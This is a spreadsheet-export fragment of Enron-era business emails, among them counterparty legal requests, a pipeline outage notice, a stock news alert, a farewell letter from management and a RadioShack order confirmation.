lunch tomorrow?  B_x000D_
_x000D_
_x000D_
_x000D_
To: Becky Pitre/HOU/ECT@ECT_x000D_
cc: Shannon McPearson/HOU/ECT@ECT, Robin Rodrigue/HOU/ECT@ECT _x000D_
Subject: Re: FWD: GET IT WHILE IT's HOT!! 2001 Calendar  _x000D_
_x000D_
You were right.  That was pretty sick!!!_x000D_
_x000D_
Hey, let's all get together for lunch sometime.  When would be a good day?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Jul 2001 14:28:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'legal &lt;.taylor@enron.com&gt;', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>Target Counterparties for Commodity Logic</t>
  </si>
  <si>
    <t>Tom Gros has asked that we start the legal process for amendments for the following potential CommodityLogic counterparties:_x000D_
_x000D_
Calpine_x000D_
Dynegy_x000D_
Reliant_x000D_
Duke_x000D_
_x000D_
Calpine has the highest priority (with the exception of the work that is currently underway for Sempra).  Let me know what information that you may need from my confirmation team._x000D_
_x000D_
Kim Theriot</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 10:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'universityofphoenix@smartreminders.com'})</t>
  </si>
  <si>
    <t>Earn your degree while you earn a living</t>
  </si>
  <si>
    <t xml:space="preserve">[IMAGE]_x000D_
SmartReminders.comSpecial Offer_x000D_
The information you want. When you want it. Where you want it.Add New=20_x000D_
RemindersMy SmartRemindersMy ProfileRefer a Friend_x000D_
SmartReminders.com Special Offer:_x000D_
_x000D_
Dear SmartReminders  Member,_x000D_
_x000D_
We've partnered with University of Phoenix to bring you this message:_x000D_
_x000D_
=09=09=09_x000D_
=09=09=09?Advance?your?career.?Achieve?your?goals.?_x000D_
=09=09=09Find out how at: http://sm.phoenix.edu/ =20_x000D_
=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09? =09=09?  =09?=20_x000D_
=09_x000D_
=09_x000D_
=09Your  college degree is within reach_x000D_
=09=09_x000D_
=09=09?  =09_x000D_
=09=09=09 =20_x000D_
=09=09=09A college degree has always been the fast track to career success.=_x000D_
?  And for=20_x000D_
25 years, University  of Phoenix has been a working professional=01,s faste=_x000D_
st=20_x000D_
route to a  college degree._x000D_
=09=09=09_x000D_
=09=09=09Our  degree programs are designed for working adults, allowing you=_x000D_
 to earn =20_x000D_
your degree years before you could at other universities._x000D_
=09=09=09=09?=20_x000D_
=09=09=09_x000D_
=09=09=09?_x000D_
=09=09=09_x000D_
=09=09=09The  unique advantages of our program include:_x000D_
=09=09=09_x000D_
=09=09=09All faculty work in the field  they teach._x000D_
=09=09=09Small classes comprised of  other working adults._x000D_
=09=09=09Attend classes just once a  week at a convenient campus location._x000D_
=09=09=09Work with a Learning Team once  a week._x000D_
=09=09=09Courses offered one at a time,  for five or six weeks each.=20_x000D_
=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09_x000D_
=09=09=09With more than 90  campuses and learning centers,  University of P=_x000D_
hoenix lets=20_x000D_
you earn your college degree in the most  efficient way possible.? We offer=_x000D_
=20_x000D_
state-of-the-industry bachelor=01,s  and master=01,s degrees to help you ex=_x000D_
cel in a=20_x000D_
number of career fields,  including: Business, Administration, Accounting,=_x000D_
=20_x000D_
Management, Technology  Management, Information Systems, Education,=20_x000D_
Counseling and Nursing._x000D_
=09=09=09=09_x000D_
=09=09=09_x000D_
=09=09=09Start  earning your degree today!? To learn more, visit:=20_x000D_
http://sm.phoenix.edu/ or call us at: 1-888-741-5251.  =20_x000D_
=09=09=09_x000D_
=09=09=09=09_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
?=20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We respect  your privacy and are a Certified Participant of the BBBOnLinec=_x000D_
=20_x000D_
Privacy Program.  To be removed from future offers,_x000D_
click  here._x000D_
SmartReminders.com  is a permission based service. To unsubscribe click =20_x000D_
here. </t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 07:31:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'victoria.versen@enron.com', 'judy.townsend@enron.com', 'scott.neal@enron.com', 'chris.ordway@enron.com', 'victor.lamadrid@enron.com', 'chris.germany@enron.com'})</t>
  </si>
  <si>
    <t>FW: TE Restriction for Oct 18-19</t>
  </si>
  <si>
    <t>FYI..._x000D_
_x000D_
_x000D_
October 18, 2001_x000D_
_x000D_
An unplanned outage at the ATHENS (ATH) Ohio Compressor station has_x000D_
occurred.  Due to high throughput levels already in the system and the_x000D_
restriction at ATH, TEXAS EASTERN TRANSMISSION, LP (TE) will not be_x000D_
accepting physical increases for Gas Day October 18, 2001 upstream of_x000D_
ATH.  This would include the entire Access Area, Market Zone 1 30 Inch &amp;_x000D_
24 Inch, Market Zone 2 upstream of the ATH compressor station.  Due Pipe_x000D_
makeup cannot be accepted for Gas Day October 19,2001.  These_x000D_
restrictions may be extended through the weekend.   Meter operators are_x000D_
reminded to flow at scheduled volumes._x000D_
_x000D_
Should you have any questions, please contact your Operations Account_x000D_
Manager._x000D_
_x000D_
_x000D_
_x000D_
*******************************************************************_x000D_
_x000D_
NOTE:_x000D_
_x000D_
Duke Energy Gas Transmission respects your online time and privacy._x000D_
You have received this email because you elected to subscribe. To_x000D_
unsubscribe, login to the E-mail Notification Subscription page at_x000D_
http://www.link.duke-energy.com/script2/Notification.asp_x000D_
uncheck the appropriate checkbox, and click the Submit button.</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 00:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Your News Alert for YHOO</t>
  </si>
  <si>
    <t>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
As requested, your News Alert for YHOO_x000D_
follows from EquityAlert.com._x000D_
To edit/discontinue your alerts please refer to end of message._x000D_
PLEASE REVIEW THE NOTICE AND DISCLAIMER BELOW_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=3D-=3D-=3D-=3D-=3D Paid Advertisement -=3D-=_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
_x000D_
Probex Successfully Closes on $12.5 Million Financing_x000D_
_x000D_
Probex Corp. (AMEX: PRB) Financing to assist in continuing_x000D_
engineering and development work leading up to construction of_x000D_
Wellsville, OH, reprocessing facility.  Groundbreaking set for_x000D_
first quarter 2001.  Probex - New, patented, unparalleled, highly_x000D_
economic and environmentally beneficial motor oil reprocessing_x000D_
technology._x000D_
_x000D_
For more information, click:_x000D_
http://205.210.134.51/a1.asp?ID=3D1261aa_x000D_
_x000D_
AOL USERS: copy &amp; paste the link above into your browser._x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
_x000D_
_x000D_
New Yahoo!-Branded Products Available at Retail for Holiday Season;_x000D_
Yahoo! Merchandise Includes Digital Camera, Computer Accessories and Books_x000D_
_x000D_
SANTA CLARA, Calif., Dec 13, 2000 (BUSINESS WIRE) -- Do you Yahoo!? Just in_x000D_
time for the holiday season, Yahoo! (Nasdaq:YHOO) today announced the_x000D_
availability of a variety of licensed Yahoo!(R)-branded products available =_x000D_
in_x000D_
retail stores and online. Items include the Yahoo! Digital Camera and the=_x000D_
=20_x000D_
Yahoo!_x000D_
HitClips Downloader, both manufactured and marketed by Hasbro Inc.'s=20_x000D_
(NYSE:HAS)_x000D_
Tiger Electronics; computer accessories from Sakar International; books fro=_x000D_
m_x000D_
HarperCollins Publishers; Yahoo!-branded apparel and much more._x000D_
_x000D_
"As Yahoo! becomes a more essential part of our audience's daily lives, we =_x000D_
are_x000D_
proud to offer new products that allow consumers to interact with Yahoo! in=_x000D_
=20_x000D_
fun_x000D_
and exciting ways," said Nancy White, director of brand marketing, Yahoo! I=_x000D_
nc._x000D_
"As Yahoo! continues to broaden the scope of branded products offered=20_x000D_
worldwide,_x000D_
we look forward to working with category leaders such as Tiger, Sakar and_x000D_
HarperCollins Publishers to provide high quality, innovative products that_x000D_
extend the Yahoo! experience online and offline."_x000D_
_x000D_
_x000D_
On the Count of Three, Say Cheese!_x000D_
_x000D_
The Yahoo! Digital Camera from Tiger Electronics is a user-friendly complet=_x000D_
e_x000D_
multimedia digital camera, which includes free software and everything need=_x000D_
ed=20_x000D_
to_x000D_
get started with digital photography. Retailing for approximately $70, the_x000D_
camera is available in multiple designs and can be used by both adults and_x000D_
children. Users can then post their digital snapshots to Yahoo! Photos_x000D_
(http://photos.yahoo.com) to share with family and friends. Using an infrar=_x000D_
ed_x000D_
flash, the Yahoo! Digital Camera also allows users to take pictures in almo=_x000D_
st_x000D_
complete darkness, surveillance-style. In addition, the camera can be mount=_x000D_
ed=20_x000D_
to_x000D_
a PC to be used as an Internet video camera. Also from Tiger is the Yahoo!_x000D_
HitClips Downloader, a portable digital audio recorder retailing for under =_x000D_
$30_x000D_
which allows users to record audio from their computer and play it back whe=_x000D_
n_x000D_
they're on the go._x000D_
_x000D_
_x000D_
Surfing in Style_x000D_
_x000D_
The Yahoo!-branded computer accessories collection from Sakar International=_x000D_
=20_x000D_
adds_x000D_
an element of fashion and fun to the ordinary personal computer. The add-on=_x000D_
s_x000D_
include a 900 MHz wireless keyboard, multimedia and surround sound speakers_x000D_
(starting at $39.99); several Internet keyboards allowing one-touch access =_x000D_
to_x000D_
users' favorite programs and features that are great for online or offline =_x000D_
use_x000D_
(starting at $14.99); as well as many software and wheel-scrolling mice_x000D_
(starting at $9.99). Appealing to both savvy and novice users, the_x000D_
Yahoo!-branded line of computer input devices offers many compelling featur=_x000D_
es,_x000D_
making PC use easy and fun. All items are sold separately and are priced fr=_x000D_
om_x000D_
$9.99 to $99.99._x000D_
_x000D_
_x000D_
We Wrote the Book_x000D_
_x000D_
Consumers looking for information and guidance about using the Web can coun=_x000D_
t=20_x000D_
on_x000D_
Yahoo!'s trusted knowledge and advice through Yahoo!'s reference guides.=20_x000D_
Yahoo!_x000D_
The Ultimate Desk Reference to the Web, a trade paperback produced by Byron_x000D_
Preiss Visual Publications Inc. and in conjunction with HarperResource, an_x000D_
imprint of HarperCollins Publishers, offers readers practical and simple ti=_x000D_
ps_x000D_
for navigating the Internet and highlights more than one thousand of the We=_x000D_
b's_x000D_
best sites. Yahoo! Ultimate Guide to Finance and Money on the Web is a_x000D_
comprehensive resource for readers who want to use the Web to understand an=_x000D_
d_x000D_
manage their personal finances. The Ultimate Desk Reference is available at_x000D_
retail for $24.95 and the Ultimate Guide to Finance and Money for $16.00_x000D_
_x000D_
_x000D_
Always Open Online_x000D_
_x000D_
Most of the above items are available in popular U.S. retail outlets. In_x000D_
addition, the Yahoo! Gear store (http://gear.yahoo.com) is a one-stop shop =_x000D_
for_x000D_
Yahoo!-branded items which make excellent holiday gifts. In addition to the_x000D_
above products, consumers can also purchase Yahoo!-branded apparel such as_x000D_
T-shirts, sweatshirts, and caps as well as other gear such as pens, cups, C=_x000D_
D_x000D_
holders -- even a Yahoo!-branded electric guitar from Gibson! Web shoppers =_x000D_
can_x000D_
also find subscriptions to Yahoo! Internet Life, the world's largest consum=_x000D_
er_x000D_
lifestyle magazine devoted to the content, culture and community of the_x000D_
Internet._x000D_
_x000D_
_x000D_
About Yahoo!_x000D_
_x000D_
Yahoo! Inc. is a global Internet communications, commerce and media company=_x000D_
=20_x000D_
that_x000D_
offers a comprehensive branded network of services to more than 166 million_x000D_
individuals each month worldwide. As the first online navigational guide to=_x000D_
=20_x000D_
the_x000D_
Web, www.yahoo.com is the leading guide in terms of traffic, advertising,_x000D_
household and business user reach, and is one of the most recognized brands_x000D_
associated with the Internet. The company also provides online business=20_x000D_
services_x000D_
designed to enhance the Web presence of Yahoo!'s clients, including audio a=_x000D_
nd_x000D_
video streaming, store hosting and management, and Web site tools and=20_x000D_
services._x000D_
The company's global Web network includes 24 World properties. Yahoo! has_x000D_
offices in Europe, the Asia Pacific, Latin America, Canada and the United_x000D_
States, and is headquartered in Santa Clara, Calif._x000D_
_x000D_
Note to Editors: Yahoo! and the Yahoo! logo are trademarks and/or registere=_x000D_
d_x000D_
trademarks of Yahoo! Inc. All other names are trademarks and/or registered_x000D_
trademarks of their respective owners._x000D_
_x000D_
_x000D_
CONTACT:          Yahoo! Inc., Santa Clara_x000D_
Nissa Anklesaria, 408/328-7738_x000D_
nissa@yahoo-inc.com_x000D_
or_x000D_
Fleishman-Hillard_x000D_
Sabrina Friedman, 415/356-1007_x000D_
friedmas@fleishman.com_x000D_
_x000D_
URL:              http://www.businesswire.com_x000D_
Today's News On The Net - Business Wire's full file on the Internet_x000D_
with Hyperlinks to your home page._x000D_
_x000D_
Copyright (C) 2000 Business Wire.  All rights reserved._x000D_
_x000D_
-0-_x000D_
_x000D_
_x000D_
KEYWORD:          CALIFORNIA INTERNATIONAL EUROPE ASIA PACIFIC CANADA_x000D_
INDUSTRY KEYWORD: ADVERTISING/MARKETING_x000D_
E-COMMERCE_x000D_
ELECTRONIC_x000D_
GAMES/MULTIMEDIA_x000D_
INTERNET_x000D_
RETAIL_x000D_
_x000D_
_x000D_
_x000D_
****************** TO EDIT YOUR EQUITY ALERTS ********************_x000D_
To unsubscribe or edit your alerts, visit_x000D_
http://www.equityalert.com/alerts.asp?uid=3Dalewis34&amp;xid=3D40352_x000D_
******************************************************************_x000D_
_x000D_
***IMPORTANT NOTICE AND DISCLAIMER REGARDING THIS COURTESY EMAIL**_x000D_
At your request, as a subscriber to our service, this email alert_x000D_
is being sent to you as a courtesy and is for information purposes_x000D_
only.  We are a financial news re-distributor.  We are not an_x000D_
investment advisory and do not purport to tell or suggest which_x000D_
companies you should monitor or which securities you should_x000D_
purchase or sell._x000D_
In addition to the information regarding the company you are_x000D_
monitoring (the =01&amp;Monitored Company=018), this email contains an_x000D_
advertisement describing a product, service or company for which we_x000D_
received a fee, at our normal advertising rates of $55 per 1,000 e-_x000D_
mails (subject to volume and other discounts), from the advertising_x000D_
company.  In addition, not withstanding our policy of prohibiting_x000D_
employees from buying or selling securities of an advertising_x000D_
company for a period of 20 days following dissemination of the_x000D_
advertisement, we may not be able to effectively monitor our_x000D_
employees to ensure compliance with the same. Consequently, there_x000D_
may be sales and/or purchases of such securities by our employees_x000D_
prior to, during and immediately following the dissemination of the_x000D_
advertisement._x000D_
Please note that (1) this email may not contain the full text of_x000D_
the press release issued by, or the research or other reports_x000D_
regarding, the Monitored Company; and (2) the text of the_x000D_
advertisement, the press release and/or reports were obtained from_x000D_
third party sources and were not written, generated or edited by_x000D_
us; accordingly, we make no representations or give any assurance_x000D_
as to the accuracy or completeness, nor have we conducted any_x000D_
independent investigations of, the disclosures regarding the_x000D_
subject matter of such releases and reports._x000D_
Please note that links to the advertising company and/or Monitored_x000D_
Company are provided for your convenience.  We assume no obligation_x000D_
for the content of such sites._x000D_
All information contained herein should be independently verified_x000D_
by you with the advertising company or with Monitored Company or_x000D_
any other sources you prefer._x000D_
[THIS IS ONLY A SUMMARY OF, AND IS QUALIFIED IN ITS ENTIRETY BY_x000D_
REFERENCE TO, THE =01&amp;EQUITYALERT SUBSCRIBER AGREEMENT AND_x000D_
DISCLAIMER.=018 PLEASE VISIT_x000D_
http://www.equityalert.com/home/disclaim.asp_x000D_
FOR ACCESS TO OUR COMPLETE DISCLAIMER]_x000D_
******************************************************************</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2000 06:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Cover letter with Lawyer's suggestion - WITH FILE - SORRY</t>
  </si>
  <si>
    <t xml:space="preserve">Jaime:_x000D_
Could you please send me the English version of this?  Alos, Mark Taylor and _x000D_
I will be talking with our Mexican  counsel tomorrow morning and I will _x000D_
update you after our call._x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	Jaime Williams@ENRON_x000D_
	07/11/2000 12:51 PM_x000D_
		 _x000D_
		 To: Carol St Clair/HOU/ECT@ECT, Leonardo Pacheco/Corp/Enron@Enron, Eric _x000D_
Thode/Corp/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Cover letter with Lawyer's suggestion - WITH FILE - SORRY_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jaime Williams/NA/Enron on 07/11/2000 _x000D_
12:52 PM ---------------------------_x000D_
_x000D_
_x000D_
Jaime Williams_x000D_
07/11/2000 12:50 PM_x000D_
To: Carol St Clair/HOU/ECT@ECT, Leonardo Pacheco/Corp/Enron@Enron, Eric _x000D_
Thode/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Cover letter with Lawyer's suggestion_x000D_
_x000D_
Guys, just senidng you the cover letter that will go to our customers _x000D_
whenever we are ready...Carol, I included the wording provided by our Mexican _x000D_
Lawyer..Let me know...Thanks. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 Feb 2000 00:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'yvan.chaxel@enron.com'})</t>
  </si>
  <si>
    <t>TECO sensitivities</t>
  </si>
  <si>
    <t>Yvon,_x000D_
_x000D_
Please run the sensitivities and present results using a table incorporating _x000D_
the following categories listed vertically down the page.  The results will _x000D_
be tabulated in columns.  The first column will be the base case.  The base _x000D_
case will always reflect the power and vol. curves at mid as of the run date _x000D_
which will be indicated on the report.  A second page should graph the power _x000D_
and oil curves used in the base case._x000D_
_x000D_
curve shift_x000D_
power vol._x000D_
oil vol._x000D_
correlation oil/power_x000D_
residual value_x000D_
Debt shape (all initial runs will be $375 mortgage)_x000D_
Plant value (all your prior runs called this "Spread")_x000D_
Call option (this is the value of the call we will own.  You should footnote _x000D_
a description of the call)_x000D_
Plant value (in prior reports you called this spread)_x000D_
Fee (this will be 5% of par amount outstanding, 315 MW x $375/kw x 5% = $5.9 _x000D_
million)_x000D_
Put premium_x000D_
Net profit (9 + 10 - 11)_x000D_
_x000D_
Items 1 - 4 should be shifted +/- 5%, 10%.  That should make 16 runs in _x000D_
total.  We'll build from there._x000D_
_x000D_
regards,_x000D_
_x000D_
Don Black</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 09:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'colson@enron.com'})</t>
  </si>
  <si>
    <t>OLSON,CINDY K  has suggested reviewers and submitted them for your approval.  _x000D_
You may review/modify this list of reviewers by logging on to PEP at _x000D_
http://pep.corp.enron.com  and going to Supervisor Services.  Please _x000D_
remember, no feedback can be completed on OLSON,CINDY K  until you have _x000D_
approved the list.</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 13:00:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.rose@enron.com', 'stacy.lesmeister@enron.com', 'tom.acton@enron.com', 'paul.couvillon@enron.com', 'michael.morris@enron.com', 'robert.crockett@enron.com', 'susan.smith@enron.com', 'yvette.miroballi@enron.com', 'larry.white@enron.com', 'jack.mitchell@enron.com', 'megan.parker@enron.com', 'maria.hernandez@enron.com', 'bob.fisher@enron.com', 'james.haden@enron.com', 'ron.green@enron.com', 'bob.camp@enron.com', 'jack.simunek@enron.com', 'edward.terry@enron.com', 'aric.archie@enron.com', 'melissa.graves@enron.com', 'elsa.villarreal@enron.com', 'mark.mccoy@enron.com', 'greg.brazaitis@enron.com', 'charlene.richmond@enron.com', 'lisa.hesse@enron.com', 'theresa.mckinney@enron.com', 'irene.flynn@enron.com', 'e..lightfoot@enron.com', 'tess.ray@enron.com', 'travis.moss@enron.com', 'amelia.alland@enron.com', 'charles.howard@enron.com', 'bud.wolcott@enron.com', 'mary.smith@enron.com', 'l..taylor@enron.com', 'katie.washington@enron.com', 's.thomas@enron.com', 'p..reinhardt@enron.com', 'rebecca.griffin@enron.com', 'michael.walters@enron.com', 'eric.mason@enron.com', 'clem.cernosek@enron.com', 'kimberly.vaughn@enron.com', 'brian.redmond@enron.com', 'rusty.belflower@enron.com', 'keith.tyree@enron.com', 'jack.peebles@enron.com', 'juanita.marchand@enron.com', 'gerald.lofton@enron.com', 'lauri.allen@enron.com', 'howard.camp@enron.com', 'nick.cocavessis@enron.com', 'cheryl.marshall@enron.com', 'eugene.peabody@enron.com', 'john.peyton@enron.com', 'lal.echterhoff@enron.com', 'jerry.bubert@enron.com', 'gary.lamphier@enron.com', 'robert.cook@enron.com', 'a..lopez@enron.com', 'nancy.landry@enron.com', 'erica.wright@enron.com', 'leslie.robinson@enron.com', 'constance.mckinsey@enron.com', 'trisha.hughes@enron.com', 'george.weissman@enron.com', 'daxa.bhavsar@enron.com', 'a..austin@enron.com', 'anita.eisenbrandt@enron.com', 'joanie.ngo@enron.com', 'mary.comello@enron.com', 'carlos.rodriguez@enron.com', 'cheryl.dudley@enron.com', 'adriana.peterson@enron.com', 'katherine.herrera@enron.com', 'rosa.brown@enron.com', 'kenneth.kaase@enron.com', 'jane.coleman@enron.com', 'r.fosdick@enron.com', 'melanie.facundo@enron.com', 'jennifer.pattison@enron.com', 'kam.welsch@enron.com', 'saidia.matthews@enron.com', 'kevin.kuehler@enron.com', 'reid.hansen@enron.com', 'michael.olsen@enron.com', 'lee.papayoti@enron.com', 'julie.meyers@enron.com', 'dena.pawlowski@enron.com', 'james.ducote@enron.com', 'brian.riley@enron.com', 'thi.ly@enron.com', 'joyce.viltz@enron.com', 'william.cosby@enron.com', 'chris.riegler@enron.com', 'nathan.hlavaty@enron.com', 'barbara.sargent@enron.com', 'john.handley@enron.com', 'sabrae.zajac@enron.com', 'michael.bilberry@enron.com', 'michael.eiben@enron.com', 'tom.shelton@enron.com', 'karen.gruesen@enron.com', 'molly.carriere@enron.com', 'candy.bywaters@enron.com', 'hpl.schneider@enron.com', 'mary.poorman@enron.com', 'janie.aguayo@enron.com', 'willie.brooks@enron.com', 'john.towles@enron.com', 'sean.maki@enron.com', 'kenny.soignet@enron.com', 'esther.buckley@enron.com', 'henry.batiste@enron.com', 'gary.hanks@enron.com', 'cynthia.hakemack@enron.com', 'karl.atkins@enron.com', 'brad.blevins@enron.com', 'judy.walters@enron.com', 'debbie.boudar@enron.com', 'karl.stewart@enron.com', 'monica.jackson@enron.com', 'cathy.harris@enron.com', 'thu.nguyen@enron.com', 'vicente.sarmiento@enron.com', 'joe.zernicek@enron.com', 'calvin.dodd@enron.com'})</t>
  </si>
  <si>
    <t>I want to take this opportunity before the transfer of Houston Pipeline Company assets and employees to American Electric Power to thank each of you for your teamwork and success in our years together._x000D_
_x000D_
Some of you were here when I joined your company in 1984, but many of you arrived during the Enron era and might not know the full story of my arrival.  I was president of Transco Energy at the time and was probably in line to be the chairman.  I did not expect to ever join another energy company.  Yet the directors of Houston Natural Gas felt like a new management team was needed for their company to prosper in a rapidly changing industry environment.  The quality of people I saw at HNG convinced me that the company would be a good platform from which to make major changes.  And the results over the last 17 years could not have been better._x000D_
_x000D_
Houston Pipeline Company has been a major contributor to developing Enron into what it is today.  Your professionalism, ideas, dedication and commitment toward this company have been instrumental in making our success possible.  For this, you will not only be a critical part of Enron's history, but you will also always deserve Enron's gratitude._x000D_
_x000D_
I wish you nothing but the very best in your next endeavors, even as I am sure you will not need my good luck wishes.  As always, your professionalism and dedication will be your best allies when facing new challenges and opportunities._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
 _x000D_
_x000D_
&lt;Embedded Picture (Metafile)&gt;</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 11:49:03 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rod.hayslett@enron.com', 'tracy.geaccone@enron.com'})</t>
  </si>
  <si>
    <t>4th current estimate</t>
  </si>
  <si>
    <t xml:space="preserve">Rod and Tracy-_x000D_
_x000D_
We are trying to plan for the 4th current estimate, and are looking at when our monthly reports roll in (around the 15th of December).  Can you give me guidance as to when we are due to give you our 4CE??  Hopefully, after the 15th will work._x000D_
_x000D_
Michael_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2000 04:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.davis@enron.com', 'stephanie.sever@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please have the Password Application amended to set up the _x000D_
counterparty as I have indicated.  Then tell Global Contracts it is done._x000D_
----- Forwarded by Tana Jones/HOU/ECT on 08/17/2000 11:01 AM -----_x000D_
_x000D_
	Stacey Richardson_x000D_
	08/17/2000 10:50 AM_x000D_
		_x000D_
		 To: Bridgette Anderson/Corp/Enron@ENRON_x000D_
		 cc: Anthony Campos/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Frank L Davis/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT_x000D_
		 Subject: Re: Counterparty Approval List for 8/14/00_x000D_
_x000D_
Can you please have Tana clarify if the counterparty wishes to have a new CP _x000D_
name set up as Northern Illinois Gas Company d/b/a Nicor Gas Company (which _x000D_
it sounds like) or if they will make financial trades under Northern Illinois _x000D_
Gas Company (since Nicor Gas Company is the physical trading entity).  We _x000D_
still cannot report (or even SET UP) the contract until we know which CP name _x000D_
is correct.  Until then, the 08/14/00 EOL report will still be outstanding._x000D_
_x000D_
Thanks,_x000D_
Stacey_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Bridgette Anderson @ ENRON                           08/17/2000 09:29 _x000D_
AM_x000D_
	_x000D_
_x000D_
To: Stacey Richardson/HOU/ECT@ECT_x000D_
cc: Anthony Campos/HOU/ECT@ECT _x000D_
Subject: Counterparty Approval List for 8/14/00_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Bridgette Anderson/Corp/Enron on _x000D_
08/17/2000 09:28 AM ---------------------------_x000D_
From: Tana Jones@ECT on 08/16/2000 05:13 PM_x000D_
To: Frank L Davis/HOU/ECT@ECT, Sheri Thomas/HOU/ECT@ECT, Stephanie _x000D_
Sever/HOU/ECT@ECT_x000D_
cc: Bridgette Anderson/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Counterparty Approval List for 8/14/00_x000D_
_x000D_
With respect to the attached list, a few things:_x000D_
_x000D_
1.  With respect to Dynegy Power Marketing, my records reflect that they are _x000D_
approved for all products (including financial &amp; power).  Can you let me know _x000D_
if your approvals reflect otherwise?_x000D_
_x000D_
2.  With respect to Nicor Gas Company and Northern Illinois Gas Company:  _x000D_
Northern Illinois Gas Company should be restyled to be "Northern Illinois Gas _x000D_
Company d/b/a Nicor Gas Company".  We have just received the executed ISDA _x000D_
Master with this entity and that is how the counterparty directed us to set _x000D_
the master up.  Nicor Gas Company appears to be their physical gas trading _x000D_
arm, so that entity name should be left alone._x000D_
_x000D_
I haven't forgotten the 8/11/00 list, I am waiting to hear back from _x000D_
Australia about a question._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2001 06:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ordercenter@radioshack.com'})</t>
  </si>
  <si>
    <t>Order Confirmation 11871528-01</t>
  </si>
  <si>
    <t>Thank you for shopping at RadioShack.com._x000D_
_x000D_
Your order number is 11871528-01 and pending credit card approval, will be _x000D_
shipped to:_x000D_
_x000D_
DAREN FARMER_x000D_
5519 CLARKSTON_x000D_
SPRING , TX   77379_x000D_
_x000D_
Your order subtotal is $12.49_x000D_
Your order tax is $1.03_x000D_
--------------------------------------------------------------------------_x000D_
Your order total is $13.52_x000D_
_x000D_
For inquiries regarding this shipment, please contact our telephone order _x000D_
center with your order number._x000D_
_x000D_
We appreciate your business and look forward to serving you in the future._x000D_
_x000D_
Sincerely,_x000D_
RadioShack.com_x000D_
_x000D_
Customer Service Contacts_x000D_
